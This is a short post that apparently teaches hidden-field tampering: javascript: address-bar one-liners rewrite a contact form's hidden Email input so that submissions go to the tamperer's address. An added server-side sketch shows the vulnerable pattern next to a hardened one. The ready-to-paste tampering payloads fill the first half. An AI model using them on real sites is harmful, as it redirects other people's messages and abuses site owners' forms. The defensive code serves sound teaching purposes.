JavaScript code can be injected through the address bar of a web browser to edit an online form before it is submitted. Below I am posting an example for archiving purposes.

Assume the page has a contact form whose submitted data is sent to an email address stored in a hidden HTML input tag, as in the following code:

<form name="ContactForm" action="submit.php" method="post">
<input type="hidden" name="Email" value="admin@website.com" />

To change the email address to: myemail@hotmail.com, the following code can be injected:

javascript:void(document.ContactForm.Email.value="myemail@hotmail.com");

Here, ContactForm is the name of the form and Email is the name of the input tag.

To check that the value has actually been changed, view it with:

javascript:alert(document.ContactForm.Email.value);

If the form has no name, check its position in the page. If it is the first form, you can refer to it as forms[0]. The same applies to the input tag, which you can refer to by its index, for example elements[0].

So, assuming the form is the first one on the page and the input tag is the fourth element in that form, the code becomes:

javascript:void(document.forms[0].elements[3].value="myemail@hotmail.com");

and

javascript:alert(document.forms[0].elements[3].value);
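
The edit above only works because the server mails whatever address arrives in the hidden field. The following is an added example, not code from the original post: a sketch of the receiving side's logic in JavaScript, showing the trusting pattern next to one that takes the recipient from server-side configuration and flags a changed value. RECIPIENTS, the function names and the sample request bodies are assumptions made up for the illustration.

```javascript
// Added example: server-side handling of the ContactForm POST body.
// RECIPIENTS, the function names and the sample bodies are constructed.

// The delivery address is stored on the server, keyed by form name.
const RECIPIENTS = new Map([["ContactForm", "admin@website.com"]]);

// Vulnerable pattern: mail goes wherever the hidden Email field says.
function recipientTrustingClient(body) {
  return new URLSearchParams(body).get("Email");
}

// Hardened pattern: the submitted Email is never used for delivery.
// It is only compared with the server's value so edits can be logged.
function resolveRecipient(formName, body) {
  if (!RECIPIENTS.has(formName)) {
    throw new Error("unknown form: " + formName);
  }
  const expected = RECIPIENTS.get(formName);
  const supplied = new URLSearchParams(body).getAll("Email");
  // Tampered if the field was edited or sent more than once.
  const tampered = supplied.some((v) => v !== expected) || supplied.length > 1;
  return { recipient: expected, tampered };
}

// Constructed request bodies: the form as served, and after the hidden
// field was edited in the browser as described in the post.
const HONEST_BODY = "Email=admin%40website.com&Message=hello";
const EDITED_BODY = "Email=myemail%40hotmail.com&Message=hello";

for (const body of [HONEST_BODY, EDITED_BODY]) {
  const { recipient, tampered } = resolveRecipient("ContactForm", body);
  console.log(
    `trusting=${recipientTrustingClient(body)} hardened=${recipient} tampered=${tampered}`
  );
}
```

With the recipient held on the server, the hidden Email input can be dropped from the form entirely.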
